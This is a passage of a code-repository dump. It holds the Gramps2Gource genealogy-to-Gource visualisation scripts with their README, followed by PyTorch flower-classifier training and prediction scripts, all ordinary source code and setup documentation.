Each tuple contains a person handle and a pseudo-path\n to be used by Gource.\n \"\"\"\n logger.debug(\"Collecting ancestors for {0}\".format(person.name))\n\n if ancestors is None:\n ancestors = []\n\n # Construct a pseudo path from the person's unique handle.\n if gource_prefix:\n gource_prefix = \"{0}/{1}\".format(gource_prefix, person.handle)\n else:\n gource_prefix = person.handle\n\n person_name = person.name_with_dates\n gource_path = \"{0}/{1}\".format(gource_prefix, person_name)\n ancestors.append((person.handle, gource_path))\n\n if person.child_of_handle:\n family = self.db.get_family(person.child_of_handle)\n\n # walk up the father's tree\n if family.father:\n self.get_ancestors(family.father,\n ancestors=ancestors,\n gource_prefix=gource_prefix)\n\n # walk up the mother's tree\n if family.mother:\n self.get_ancestors(family.mother,\n ancestors=ancestors,\n gource_prefix=gource_prefix)\n\n return ancestors\n\n def pedigree(self, names, output_file):\n \"\"\"\n Creates a custom Gource log containing the pedigree information for\n the specified names.\n \"\"\"\n\n if not names:\n logger.error(\"No focus persons supplied\")\n sys.exit(1)\n\n all_records = []\n\n for name in names:\n person_handles = []\n logger.info(\"Generating pedigree output for: {0}\".format(name))\n person_handle = self.db.find_person(name)\n if person_handle:\n person = self.db.get_person(person_handle)\n ancestor_handles = self.get_ancestors(person)\n\n logger.debug(\"{0} has {1} ancestors in the database\".format(\n name, len(ancestor_handles)))\n person_handles = ancestor_handles\n\n if person_handles:\n people_to_plot = []\n for person_handle, person_gource_path in person_handles:\n person = self.db.get_person(person_handle)\n try:\n associated_events = person.associated_events()\n except TypeError:\n associated_events = []\n\n # Filter associated events to only include those with\n # dates. Only dated events are useful when outputing\n # a Gource formatted log.\n associated_events_with_dates = []\n for associated_event in associated_events:\n obj, event, directEvent = associated_event\n if event.date:\n associated_events_with_dates.append(\n associated_event)\n\n if associated_events_with_dates:\n people_to_plot.append(\n (person, person_gource_path,\n associated_events_with_dates))\n\n if people_to_plot:\n logger.info(\n \"Starting generation of custom gource log data\")\n\n records = self._to_pedigree_gource_log_format(\n people_to_plot)\n all_records.extend(records)\n\n logger.info(\n \"Finished generation of custom gource log data\")\n\n if all_records:\n # Sort events by time such that Gource displays the pedigree in reverse order\n logger.info(\n \"Adjusting timestamps so gource displays them in reverse order\")\n records = [(ts * -1, name, event, path) for ts, name, event, path in all_records]\n records.sort()\n\n logger.info(\"Writing custom gource log data to {0}\".format(output_file))\n\n with open(output_file, 'w') as fd:\n for ts, name, event, path in records:\n fd.write(\"{0}|{1}|{2}|{3}\\n\".format(ts, name, event, path))\n fd.write(\"\\n\") # add an empty line at the end to trigger EOF\n\n logger.info(\n \"Completed. 
Custom gource log file: {0}\".format(\n output_file))\n else:\n logger.error(\n \"No gource log file created - no records to write\")\n\n def _to_gource_log_format(self, person_events):\n \"\"\"\n Return a list of custom gource formatted log entries based on the list\n of person events passed in.\n \"\"\"\n\n records = []\n\n for person, person_gource_path, related_events in person_events:\n\n logger.debug(\"Creating log entries for {0}\".format(person.name))\n\n # Reduce events to only those that contain dates\n related_events_with_dates = []\n for related_event in related_events:\n person_family_object, event, directEvent = related_event\n if event.date:\n related_events_with_dates.append(related_event)\n else:\n logger.debug(\"No date for event {0}\".format(event.type))\n\n if related_events_with_dates:\n\n for obj, event, directEvent in related_events_with_dates:\n\n if event.datetime.year < ref_dt.year:\n # Year is less than the epoch meaning we can't use\n # time.mktime to create a useful timestamp for us.\n # Instead, subtract the necessary seconds from the\n # epoch time to arrive at the event time.\n ref_delta = ref_dt - event.datetime\n delta_seconds = ref_delta.total_seconds()\n timestamp = ref_timestamp - delta_seconds\n else:\n timestamp = time.mktime(event.datetime.timetuple())\n\n # Gource requires timestamp as an int\n timestamp = int(timestamp)\n\n if event.type == 'Birth':\n if directEvent:\n gource_event = GOURCE_ADDED\n else:\n gource_event = GOURCE_MODIFIED\n elif event.type in ['Baptism', 'Christening']:\n gource_event = GOURCE_MODIFIED\n elif event.type == 'Death':\n gource_event = GOURCE_DELETED\n elif event.type in ['Burial', 'Cremation']:\n gource_event = GOURCE_MODIFIED\n elif event.type in ['Marriage', 'Marriage Banns']:\n gource_event = GOURCE_MODIFIED\n elif event.type == 'Census':\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Divorce\", 'Divorce Filing']:\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Electoral Roll\":\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Emigration\":\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Residence\", \"Property\"]:\n gource_event = GOURCE_MODIFIED\n elif event.type in [\"Immigration\", \"Emmigration\"]:\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Occupation\":\n gource_event = GOURCE_MODIFIED\n elif event.type == \"Probate\":\n gource_event = GOURCE_MODIFIED\n else:\n gource_event = GOURCE_UNKNOWN\n logger.debug(\"Don't know how to handle event type {0}\".format(event.type))\n\n if gource_event != GOURCE_UNKNOWN:\n record = (timestamp, person.surname.lower(),\n gource_event, person_gource_path)\n records.append(record)\n\n records.sort()\n return records\n\n def _to_pedigree_gource_log_format(self, person_events):\n \"\"\"\n Return a list of pedigree specific custom gource formatted log entries\n based on the list of person events passed in.\n \"\"\"\n\n records = []\n\n for person, gource_path, related_events in person_events:\n\n logger.debug(\"Creating log entries for {0}\".format(person.name))\n\n # Reduce events to only those that contain dates\n related_events_with_dates = []\n for related_event in related_events:\n person_family_object, event, directEvent = related_event\n if event.date:\n related_events_with_dates.append(related_event)\n else:\n logger.debug(\"No date for event {0}\".format(event.type))\n\n if related_events_with_dates:\n\n for obj, event, directEvent in related_events_with_dates:\n\n if event.datetime.year < ref_dt.year:\n # Year is less than the 
epoch meaning we can't use\n # time.mktime to create a useful timestamp for us.\n # Instead, subtract the necessary seconds from the\n # epoch time to arrive at the event time.\n ref_delta = ref_dt - event.datetime\n delta_seconds = ref_delta.total_seconds()\n timestamp = ref_timestamp - delta_seconds\n else:\n timestamp = time.mktime(event.datetime.timetuple())\n\n # Gource requires timestamp as an int\n timestamp = int(timestamp)\n\n # For this particular application we only want to capture\n # the birth (ADDED) event.\n\n if event.type == 'Birth':\n if directEvent:\n gource_event = GOURCE_ADDED\n record = (timestamp, person.surname.lower(),\n gource_event, gource_path)\n records.append(record)\n\n records.sort()\n return records\n\n\nif __name__ == \"__main__\":\n\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"Create Gource custom logs from Gramps data\")\n parser.add_argument(\"-d\", \"--db\", dest=\"database\", default=None,\n type=str,\n help=\"The gramps database file to use\")\n parser.add_argument(\"-n\", \"--names\", action='append', dest=\"names\",\n default=None, type=str,\n help=\"The focus person to extract pedigree data for\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=None,\n type=str,\n help=\"The name of the file to send the output to\")\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO, format='%(levelname)s - %(message)s')\n\n if args.database is None:\n print(\"Error: No gramps file provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.names is None:\n print(\"Error: No focus name(s) provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.output is None:\n if len(args.names) > 1:\n args.output = \"pedigree.log\"\n else:\n lower_name = args.names[0].lower().replace(\" \", \"_\")\n args.output = \"pedigree_{0}.log\".format(lower_name)\n\n g2g = Gramps2Gource(args.database)\n g2g.pedigree(args.names, args.output)\n\n logger.info(\"Done.\")\n" }, { "alpha_fraction": 0.6057640314102173, "alphanum_fraction": 0.6112017631530762, "avg_line_length": 27.71875, "blob_id": "6834825d06576e5ca7cda24fe3c81dd0c8654154", "content_id": "e69c74d0288e1364573525185e811f02d33c54f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "permissive", "max_line_length": 77, "num_lines": 64, "path": "/custom_date_g2g.py", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "\nimport argparse\nimport logging\nimport sys\n\nimport gramps\nfrom gramps2gource import Gramps2Gource\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef my_date_handler(datestring):\n ''' Implement your custom date parser here.\n\n :param datestring: a date string containg a date in a particular calendar\n format.\n\n :return: a datetime object representing the date.\n '''\n raise NotImplementedError\n\n\nparser = argparse.ArgumentParser(\n description=\"Create Gource custom logs from Gramps data\")\nparser.add_argument(\"-d\", \"--db\", dest=\"database\", default=None,\n type=str,\n help=\"The gramps database file to use\")\nparser.add_argument(\"-n\", \"--names\", action='append', dest=\"names\",\n default=None, type=str,\n help=\"The focus person to extract pedigree data for\")\nparser.add_argument(\"-o\", \"--output\", dest=\"output\", default=None,\n type=str,\n help=\"The name of the file to send the output to\")\n\n\nif __name__ == \"__main__\":\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO, 
format='%(levelname)s - %(message)s')\n\n if args.database is None:\n print(\"Error: No gramps file provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.names is None:\n print(\"Error: No focus name(s) provided\")\n args.print_usage()\n sys.exit(1)\n\n if args.output is None:\n if len(args.names) > 1:\n args.output = \"pedigree.log\"\n else:\n lower_name = args.names[0].lower().replace(\" \", \"_\")\n args.output = \"pedigree_{0}.log\".format(lower_name)\n\n gramps.date_processor.register('my_cal_format', my_date_handler)\n g2g = Gramps2Gource(args.database)\n g2g.pedigree(args.names, args.output)\n\n logger.info(\"Done.\")\n" }, { "alpha_fraction": 0.7342668771743774, "alphanum_fraction": 0.7512356042861938, "avg_line_length": 41.74647903442383, "blob_id": "00fb862447a5b7f91d8766e03c3ae65ef6f478a9", "content_id": "f70a25b5586c3c0a1d5047f79cfdc76f01c7835e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6070, "license_type": "permissive", "max_line_length": 497, "num_lines": 142, "path": "/README.md", "repo_name": "claws/gramps2gource", "src_encoding": "UTF-8", "text": "# Gramps2Gource\n\nBlurring the line between Genealogy and Software Configuration Management visualisation.\n\n[![Build Status](https://travis-ci.org/claws/gramps2gource.png?branch=master)](https://travis-ci.org/claws/gramps2gource)\n\n## Overview\n\n**Gramps2Gource** combines [Gramps](http://gramps-project.org/) (a Genealogy program written in Python) and [Gource](https://code.google.com/p/gource/) (a software version control visualisation tool for showing changes over time) to help produce a novel family history visualisation. It parses exported `.gramps` files to produce a Gource custom log file containing the pedigree for a specified person. This custom log file can then be passed to Gource for rendering. See the example video below:\n\n<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=sPtTTv6d0s8\n\" target=\"_blank\"><img src=\"http://i1.ytimg.com/vi/sPtTTv6d0s8/mqdefault.jpg\"\nalt=\"Gramps2Gource Example\" border=\"10\" /></a>\n\n\nThe Gource custom log format contains the following pipe ('|') delimited fields:\n\n timestamp - A unix timestamp of when the update occured.\n username - The name of the user who made the update.\n type - initial for the update type - (A)dded, (M)odified or (D)eleted.\n file - Path of the file updated.\n colour - A colour for the file in hex (FFFFFF) format. Optional.\n\nGramps2Gource works on Python2.7 and Python3.3.\n\nOne day I may investigate integrating this into Gramps as a plugin where it could access the Gramps database directly instead of via an exported `.gramps` file.\n\nAs always, garbage in garbage out. If your database is not well managed and consistent then your milage may vary.\n\nThis is really just a proof of concept. There is lots of cleanup that could be done and lots that could be added but it does what I wanted.\n\n## Setup\n\n### Install Gource\n\nGource can be installed using:\n\n $ sudo apt-get install gource\n\nNOTE: Gource versions prior to v0.38 could not handle negative times (times before 1970). This was a real show stopper for displaying family history which is all based in the past. However, since version 0.38 this issue was resolved. 
In recent versions of Ubuntu the Gource version is v0.40 so this should not be a problem.\n\n### Install Python Dependencies\n\n#### Install Future module\n\nGramps2Gource uses dateutil to help parse complex date descriptions.\n\n $ [sudo] pip[3] install python-dateutil\n\n#### Install Future module\n\nFor Python2 and Python3 compatibility Gramps2Gource uses the `future` module, hence this must be installed also.\n\n $ [sudo] pip[3] install future\n\n### Export a gramps file\n\n 1. Open your Gramps family history database\n 2. From the menu choose `Family Trees` then `Export...`\n 3. In the dialog that opens click `Forward`.\n 4. Select `Gramps XML (family tree)` then click forward.\n 5. Click forward again as the defaults are OK.\n 6. Choose a filename then click `Forward`.\n 7. Click Apply.\n\n### Download Gramps2Gource\n\n\tgit clone https://github.com/claws/gramps2gource.git\n\tcd gramps2gource\n\n\n## Using Gramps2Gource\n\nTo generate the custom gource log and display it you need to tell the `gramps2gource.py` script the focus person and the path to the Gramps database file. An output file containing the gource custom log will be saved to a file called `pedigree_<name>.log`.\n\nExample:\n\n $ python gramps2gource.py --name=\"Amber Marie Smith\" --db=example.gramps --output=pedigree_amber_marie_smith.log\n $ cat pedigree_amber_marie_smith.log | gource --load-config gource.conf -\n\nThe `gource.conf` effectively builds a command line similar to:\n\n $ cat pedigree_amber_marie_smith.log | gource -1280x720 --log-format custom --font-size 20 --hide users,dirnames,date --stop-at-end --camera-mode overview --seconds-per-day 1 --disable-bloom --auto-skip-seconds 1 -i 0 -c 3.0 -\n\nThe '-' at the end is important, it instructs Gource to read from standard input.\n\n\n### Calendar Formats\n\nEvent dates can often be stored in different calendar formats. To accomodate\nthis it is possible to implement your own date parser to convert your specific\ncalendar date strings into the necessary datetime object used by Gramps2Gource.\n\nInstead of running `gramps2gource.py` you will need to use something like the\n`custom_date_g2g.py` example. This script accepts the same command line\narguments as the `gramps2gource.py` script.\n\nPrior to running the script you will need to make some code changes to\nimplement and register your specific date handler functions.\n\nFor example, if you have event dates in `French Republican` format (e.g. the\n`cformat` field stored within the gramps date item is `French Republican`) you\nwould create and register a handler with the name `French Republican`. For\nexample:\n\n``` python\n\ndef frech_republican_date_handler(datestring):\n return magic_datetime_creater(datestring)\n\ngramps.date_processor.register(\n 'French Republican', french_republican_date_handler)\n```\n\nYou need to register the date parser prior to instantiating the\n`Gramps2Gource` object.\n\n\n### Multiple Focus People\n\nMultiple `name` arguments can be specified if you want to show more than one focus person. 
When multiple names are supplied the output file defaults to `pedigree.log`.\n\nExample:\n\n $ python gramps2gource.py --name=\"Amber Marie Smith\" --name=\"John Hjalmar Smith\" --db=example.gramps --output=pedigree.log\n $ cat pedigree.log | gource --load-config gource.conf --hide-root -\n\n\n\n### Record Visualisation\n\nTo record the visualisation to a video file, the following commands may be useful.\n\nh264:\n\n $ cat ~/path/to/custom_output.log | gource --load-config gource.conf -output-ppm-stream - --output-framerate 30 - | avconv -y -r 30 -f image2pipe -vcodec ppm -i - -b 8192K /path/to/video/output/file.mp4\n\nwebm:\n\n $ cat ~/path/to/custom_output.log | gource --load-config gource.conf -output-ppm-stream - | avconv -y -r 30 -f image2pipe -vcodec ppm -i - -vcodec libvpx -b 10000K /path/to/video/output/file.webm\n\n[![Analytics](https://ga-beacon.appspot.com/UA-29867375-2/gramps2gource/readme?pixel)](https://github.com/claws/gramps2gource)\n" } ]
4
dcurl/aipnd-project
https://github.com/dcurl/aipnd-project
02d526faf6308332c696334fdb6762aad6e87ae0
7d5376b81b8701a506034a2752793b70cc48066e
5ce7a760cee5abdcedc329048e0c4063874010d2
refs/heads/master
2020-04-22T01:22:04.099072
2019-02-27T00:56:12
2019-02-27T00:56:12
170,012,218
0
0
MIT
2019-02-10T18:38:43
2019-01-26T14:49:28
2018-11-30T15:50:56
null
[ { "alpha_fraction": 0.6491418480873108, "alphanum_fraction": 0.6667391061782837, "avg_line_length": 29.483444213867188, "blob_id": "6babe6dd4e73dcc973740c910591acd8414284b7", "content_id": "3c6440a92fece24fc4a60c48e8919197fa9a1ab2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4603, "license_type": "permissive", "max_line_length": 127, "num_lines": 151, "path": "/predict.py", "repo_name": "dcurl/aipnd-project", "src_encoding": "UTF-8", "text": "#Imports\nimport json\nimport sys\n\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nfrom PIL import Image\n\nimport argparse\n\n#Create argparse for easy user entry\nparser = parser = argparse.ArgumentParser()\nparser.add_argument('--img_path', type = str, default = 'flowers/test/52/image_04200.jpg', help = 'Directory of Dataset')\nparser.add_argument('--load_chkpt', type = str, default = 'checkpoint.pth', help='Load the trained model from a file')\nparser.add_argument('--gpu', type = bool, default = 'True', help='True for GPU, False for CPU')\nparser.add_argument('--category_names', type = str, default = 'cat_to_name.json', help='File containing classifier categories')\nparser.add_argument('--top_k', type = int, default = 5, help = 'Number of Top Categories to return')\nargs = parser.parse_args()\n\n# Set variables based on user entry\nif args.img_path is not None:\n img_path = args.img_path\n\nif args.gpu is not None:\n gpu = args.gpu\n\nif args.load_chkpt is not None:\n load_chkpt = args.load_chkpt\n\nif args.category_names is not None:\n category_names = args.category_names\n\nif args.top_k is not None:\n top_k = args.top_k\n\n\n# Load checkpoint Function\ndef load_checkpoint(filepath):\n checkpoint= torch.load(filepath)\n model = getattr(models, checkpoint['architecture'])(pretrained=True)\n model.class_to_idx = checkpoint['class_to_idx']\n model.classifier = checkpoint['classifier']\n model.load_state_dict(checkpoint['state_dict'])\n return model\n\n# Process Image Function\ndef process_image(image):\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\n returns an Numpy array\n '''\n\n # TODO: Process a PIL image for use in a PyTorch model\n # Set Variables\n means = [0.485, 0.456, 0.406]\n std_devs = [0.229, 0.224, 0.225]\n\n # Processing Steps\n process_img = transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(means, std_devs)])\n\n # Process image through Processing Steps\n pil_img = Image.open(image)\n pil_img = process_img(pil_img).float()\n np_img = np.array(pil_img)\n\n return np_img\n\n# Display Image Function\ndef imshow(image, ax=None, title=None):\n if ax is None:\n fig, ax = plt.subplots()\n\n # PyTorch tensors assume the color channel is the first dimension\n # but matplotlib assumes is the third dimension\n image = image.transpose((1, 2, 0))\n\n # Undo preprocessing\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n image = std * image + mean\n\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\n image = np.clip(image, 0, 1)\n\n ax.imshow(image)\n\n return ax\n\n# Prediction function\ndef predict(image_path, model, topk=5):\n # Process image\n sample_img = process_image(image_path)\n\n # Convert Numpy to Tensor\n img_tensor = torch.from_numpy(sample_img).type(torch.FloatTensor)\n\n # Add 
batch of size 1 to image\n sample_input = img_tensor.unsqueeze(0)\n\n # Get Probabilities\n ps = torch.exp(model.forward(sample_input))\n ps, labels = torch.topk(ps, topk)\n\n # Seperate Probabilities (ps), Numeric Labels (labels) into individual lists\n top_ps = ps.detach().numpy().tolist()[0]\n top_labels = labels.detach().numpy().tolist()[0]\n\n # Gather Flower Labels and convert Numeric Label to Flower Label\n with open('cat_to_name.json', 'r') as f:\n cat_to_name = json.load(f)\n\n idx_to_class = {val: key for key, val in\n model.class_to_idx.items()}\n top_flowers = [cat_to_name[idx_to_class[label]] for label in top_labels]\n\n\n # Return Probabilities (ps), Numeric Labels (Labels), Flower Labels\n return top_ps, top_labels, top_flowers\n\n\n# Test Loading Checkpoint\n#Load model from checkpoint saved in train.py\nmodel = load_checkpoint(load_chkpt)\n\n#Switch to CPU and Evaluation\nmodel.to('cpu')\nmodel.eval()\n\n# Set Test Image\nimage_path = img_path\n\n# Make prediction\nps, labels, flowers = predict(image_path, model, top_k)\n\n# Print Prediction\nprint(\"Image: \", img_path)\nprint(\"\\nTop \", top_k, \" Predictions\")\nprint(\"Percentage: \", ps)\nprint(\"Numeric Label: \", labels)\nprint(\"Flower Label: \", flowers)\nprint(\"\\nTop Prediction\")\nprint(\"Percentage: \", round(ps[0] * 100, 2), \"%\")\nprint(\"Numeric Label: \", labels[0])\nprint(\"Flower Label: \", flowers[0])\n" }, { "alpha_fraction": 0.6055343747138977, "alphanum_fraction": 0.6291984915733337, "avg_line_length": 39.7782096862793, "blob_id": "fd146ec61f7e99b549a434968c6d62d5cb38d501", "content_id": "895d62d67a596d1c2faa3f91da6c315f9ed6ef1f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10480, "license_type": "permissive", "max_line_length": 223, "num_lines": 257, "path": "/train.py", "repo_name": "dcurl/aipnd-project", "src_encoding": "UTF-8", "text": "# Imports\nimport json\nimport sys\n\nimport torch\nimport numpy as np\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nimport argparse\n\n#Create argparse for easy user entry\nparser = parser = argparse.ArgumentParser()\nparser.add_argument('--data_dir', type = str, default = 'flowers', help = 'Directory of Dataset')\nparser.add_argument('--gpu', type = bool, default = 'True', help='True for GPU, False for CPU')\nparser.add_argument('--learn_rate', type = float, default = 0.001, help = 'Learning Rate (Ex: 0.001)')\nparser.add_argument('--epochs', type = int, default = 10, help = 'Number of Epochs for Training')\nparser.add_argument('--arch', type = str, default='densenet121', help='Architecture: Either densenet121 or vgg16')\nparser.add_argument('--hidden_units', type = int, default = 256, help='Units for Hidden Layer')\nparser.add_argument('--save_dir', type = str, default = 'checkpoint.pth', help='Save the trained model to a file')\nargs = parser.parse_args()\n\n# Set variables based on user entry\nif args.data_dir is not None:\n data_directory = args.data_dir\n\nif args.gpu is not None:\n gpu = args.gpu\n\nif args.learn_rate is not None:\n learn_rate = args.learn_rate\n\nif args.epochs is not None:\n epochs = args.epochs\n\nif args.arch is not None:\n arch = args.arch\n\nif args.hidden_units is not None:\n hidden_units = args.hidden_units\n\nif args.save_dir is not None:\n save_dir = args.save_dir\n\n# Function to set Directories for the Train, Validation, and Test Data\ndef load_data(data_directory = 
'flowers'):\n data_dir = data_directory\n train_dir = data_dir + '/train'\n valid_dir = data_dir + '/valid'\n test_dir = data_dir + '/test'\n return data_dir, train_dir, valid_dir, test_dir\n\n# Function to transform data for Train, Validation, and Test Sets\ndef transform_data(data_dir, train_dir, valid_dir, test_dir):\n data_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n train_transforms = transforms.Compose([transforms.RandomRotation(30),\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n valid_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n test_transforms = transforms.Compose([transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n\n # TODO: Load the datasets with ImageFolder\n image_datasets = datasets.ImageFolder(data_dir, transform = data_transforms)\n train_datasets = datasets.ImageFolder(train_dir, transform = train_transforms)\n valid_datasets = datasets.ImageFolder(valid_dir, transform = valid_transforms)\n test_datasets = datasets.ImageFolder(test_dir, transform = test_transforms)\n\n # TODO: Using the image datasets and the trainforms, define the dataloaders\n dataloaders = torch.utils.data.DataLoader(image_datasets)\n trainloader = torch.utils.data.DataLoader(train_datasets, batch_size=64, shuffle=True)\n validloader = torch.utils.data.DataLoader(valid_datasets, batch_size=32)\n testloader = torch.utils.data.DataLoader(test_datasets, batch_size=32)\n return train_datasets, valid_datasets, test_datasets, trainloader, validloader, testloader\n\n# Function to build custom network and train it (calls the build_and_train Function)\ndef set_model(arch='densenet121', learn_rate = 0.001, hidden_units = [256], epochs=10, gpu = True):\n\n # TODO: Build and train your network\n # Load a pre-trained network, depending on user input\n if arch == \"vgg16\":\n model = models.vgg16(pretrained=True)\n input_size = 25088\n model, model_classifier, model_optimizer, model_statedict, optimizer_statedict = build_and_train(model = model, learn_rate = learn_rate, input_size = input_size, hidden_size = hidden_units, epochs=epochs, gpu = gpu)\n\n elif arch == \"densenet121\":\n model = models.densenet121(pretrained=True)\n input_size = 1024\n model, model_classifier, model_optimizer, model_statedict, optimizer_statedict = build_and_train(model = model, learn_rate = learn_rate, input_size = input_size, hidden_size = hidden_units, epochs=epochs, gpu = gpu)\n else:\n print('Please select Architecture as \"vgg16\" or \"densenet121\"')\n sys.exit()\n\n return model, input_size, model_classifier, model_optimizer, model_statedict, optimizer_statedict\n\n# Buid and train model\ndef build_and_train(model = models.densenet121(pretrained=True), learn_rate = 0.001, input_size = 1024, hidden_size = 256, epochs=10, gpu = True):\n # Define a new, untrained feed-forward\n # network as a classifier, using ReLU activations and dropout\n\n # Freeze parameters so we don't backprop through them\n for param in model.parameters():\n param.requires_grad = False\n\n #input_size = 1024\n #hidden_size = hidden_units\n output_size = 
102\n\n #Build Classifier\n from collections import OrderedDict\n classifier = nn.Sequential(OrderedDict([\n ('drop', nn.Dropout(0.50)),\n ('fc1', nn.Linear(input_size, hidden_size)),\n ('relu1', nn.ReLU()),\n ('fc2', nn.Linear(hidden_size, output_size)),\n ('softmax', nn.LogSoftmax(dim = 1))\n ]))\n\n model.classifier = classifier\n\n\n # Train the classifier layers using backpropagation\n # using the pre-trained network to get the features\n if gpu == True:\n model.to('cuda')\n else:\n model.to('cpu')\n\n\n #Train a model with a pre-trained network\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.classifier.parameters(), lr = learn_rate)\n\n\n # Variables\n epochs = epochs\n print_every = 10\n steps = 0\n running_loss = 0\n\n # Set device agnostic to automatically decide if cuda (gpu) or cpu\n #device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Track the loss and accuracy on the validation set to determine the best hyperparameters\n # Start Training Loop (will measure validation as we're training)\n for e in range(epochs):\n\n # Make sure training is on\n model.train()\n\n for ii, (inputs, labels) in enumerate(trainloader):\n\n steps += 1\n\n # Move Parameters, model to GPU or CPU, depending on what user requested\n if gpu == True:\n inputs, labels = inputs.to(\"cuda\"), labels.to(\"cuda\")\n else:\n inputs, labels = inputs.to(\"cpu\"), labels.to(\"cpu\")\n\n #Flatten image into 25088 (244 * 244) long vector\n #inputs.resize_(inputs.size()[0], 25088)\n\n optimizer.zero_grad()\n\n # Forward and backward passes\n outputs = model.forward(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n\n if steps % print_every == 0:\n\n # Make sure network is in eval mode for inference\n model.eval()\n\n # Turn off gradients for validation, saves memory and computations\n with torch.no_grad():\n valid_loss, accuracy = validation(model, validloader, criterion, gpu)\n\n print(\"Epoch: {}/{}... \".format(e+1, epochs),\n \"Training Loss: {:.3F}.. \".format(running_loss/print_every),\n \"Validation Loss: {:.3F}.. 
\".format(valid_loss/len(validloader)),\n \"Validation Accuracy: {:.3f}\".format(accuracy/len(validloader)))\n\n running_loss = 0\n\n # Make sure training is back on\n model.train()\n\n return model, model.classifier, optimizer, model.state_dict(), optimizer.state_dict()\n\n#Implement function for validation pass\ndef validation(model, validloader, criterion, gpu = True):\n valid_loss = 0\n accuracy = 0\n\n for inputs, labels in validloader:\n if gpu == True:\n inputs, labels = inputs.to(\"cuda\"), labels.to(\"cuda\")\n else:\n inputs, labels = inputs.to(\"cpu\"), labels.to(\"cpu\")\n\n output = model.forward(inputs)\n valid_loss = criterion(output, labels).item()\n\n ps = torch.exp(output)\n equality = (labels.data == ps.max(dim=1)[1])\n accuracy += equality.type(torch.cuda.FloatTensor).mean()\n\n return valid_loss, accuracy\n\ndef save_checkpoint(checkpoint, save_dir = 'checkpoint.pth'):\n torch.save(checkpoint, save_dir)\n\n# Load the Datasets\ndata_dir, train_dir, valid_dir, test_dir = load_data(data_directory)\n\n# Transform the Data\ntrain_datasets, valid_datasets, test_datasets, trainloader, validloader, testloader = transform_data(data_dir, train_dir, valid_dir, test_dir)\n\n#Set, Build, and Train the Model, Returns info for Checkpoint\nmodel, input_size, model_classifier, model_optimizer, model_statedict, optimizer_statedict = set_model(arch = arch, learn_rate = learn_rate, hidden_units = hidden_units, epochs = epochs, gpu = gpu)\n\n#Create & Save Checkpoint\nmodel.class_to_idx = train_datasets.class_to_idx\n\ncheckpoint = {'input_size': input_size,\n 'output_size': 102,\n 'hidden_size': hidden_units,\n 'epochs': epochs,\n 'classifier': model_classifier, #model.classifier\n 'architecture': arch,\n 'state_dict': model_statedict, #model.statedict\n 'optimizer': model_optimizer, #optimizer\n 'optimizer_state': optimizer_statedict, #optimizer.state_dict()\n 'class_to_idx': model.class_to_idx}\n\nsave_checkpoint(checkpoint, save_dir)\nprint(\"Checkpoint Saved Successfully\")\n" } ]
2
forkworkClone/XSStrike
https://github.com/forkworkClone/XSStrike
67c4637170ca527264a851099faa6bef4bb05df1
ce4bfad386d991c40bcd6d36a2a3837fa050d59f
1b66379ca1746dd240ff9694d1f90f0896f29f42
refs/heads/master
2020-04-05T16:55:55.253560
2018-11-10T18:06:15
2018-11-10T18:06:15
null
0
0
null
null
null
null
null
